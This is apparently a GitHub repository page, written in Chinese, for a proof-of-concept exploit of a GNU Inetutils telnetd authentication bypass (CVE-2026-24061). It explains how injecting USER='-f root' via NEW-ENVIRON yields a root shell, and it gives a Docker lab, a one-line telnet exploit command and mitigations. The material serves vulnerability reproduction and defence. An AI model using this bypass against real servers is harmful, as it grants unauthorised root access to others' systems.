midox008/CVE-2026-24061
GitHub: midox008/CVE-2026-24061
针对 GNU Inetutils telnetd 远程身份验证绕过漏洞(CVE-2026-24061)的 PoC 利用工具,通过 NEW-ENVIRON 选项注入实现无密码获取 root 权限。
Stars: 0 | Forks: 0
文本功能3
1更改 feat2
1功能测试
# CVE-2026-24061
## GNU Inetutils telnetd 远程身份验证绕过
### 描述
GNU Inetutils telnetd 中存在一个严重的身份验证绕过漏洞,影响 1.9.3 至 2.7 版本。
该漏洞利用 NEW-ENVIRON telnet 选项向 `login(1)` 注入恶意参数。通过 telnet 协议设置 `USER=-f root`,攻击者可以绕过身份验证并在无需凭证的情况下获取 root shell。
### 受影响版本
- GNU Inetutils 1.9.3 - 2.7
### 技术细节
telnet 协议支持 NEW-ENVIRON 选项 (RFC 1572),该选项允许客户端向服务器发送环境变量。`telnetd` 守护进程将 USER 变量作为参数传递给 `login(1)`。
通过发送 `USER=-f root`,该值会被解析为:
- `-f` 标志:跳过身份验证(受信任的主机)
- `root`:目标用户
这会导致执行 `login -f root`,从而立即授予 root 访问权限。
PoC 通过检查 `IAC WILL ECHO` (0xff 0xfb 0x01) 来检测是否成功利用漏洞——这是服务器在授予 shell 访问权限时发送的协议信号。
### 实验环境搭建
```
# 构建并运行存在漏洞的 telnetd 容器
docker compose up --build -d
# 测试 exploit
go run poc.go 127.0.0.1 2323
```
### 漏洞利用
```
# 使用 Go PoC(带交互式 shell)
go run poc.go
# 使用标准 telnet 客户端的简单 PoC
env USER='-f root' telnet -a
```
### 缓解措施
- **认真地说,在 2026 年请停止使用 telnet** 🙏
- 改用 SSH(它已经存在 31 年了,我甚至都不在 95 年出生的,哈哈)
- 升级到已修补的 GNU Inetutils 版本
- 通过防火墙规则限制 telnet 访问
### 文件
- `poc.go` - 带有交互式 shell 的 Go 漏洞利用程序
- `Dockerfile` - 存在漏洞的 telnetd 容器
- `docker-compose.yml` - 实验环境编排
### 参考
- 安全公告:https://www.openwall.com/lists/oss-security/2026/01/20/2
- GNU Inetutils:https://www.gnu.org/software/inetutils/
- RFC 1572 (NEW-ENVIRON):https://tools.ietf.org/html/rfc1572
### 致谢
- LeakIX 研究团队
首次提交添加的文本
2秒文本
1功能测试
标签:1day漏洞, CISA项目, CVE-2026-24061, Docker靶场, EVTX分析, GNU Inetutils, Go语言PoC, Linux漏洞, NEW-ENVIRON选项, RCE, Root Shell, telnetd, Web报告查看器, 任意代码执行, 协议漏洞, 提权, 日志审计, 漏洞复现, 环境变量注入, 网络安全, 请求拦截, 远程认证绕过, 隐私保护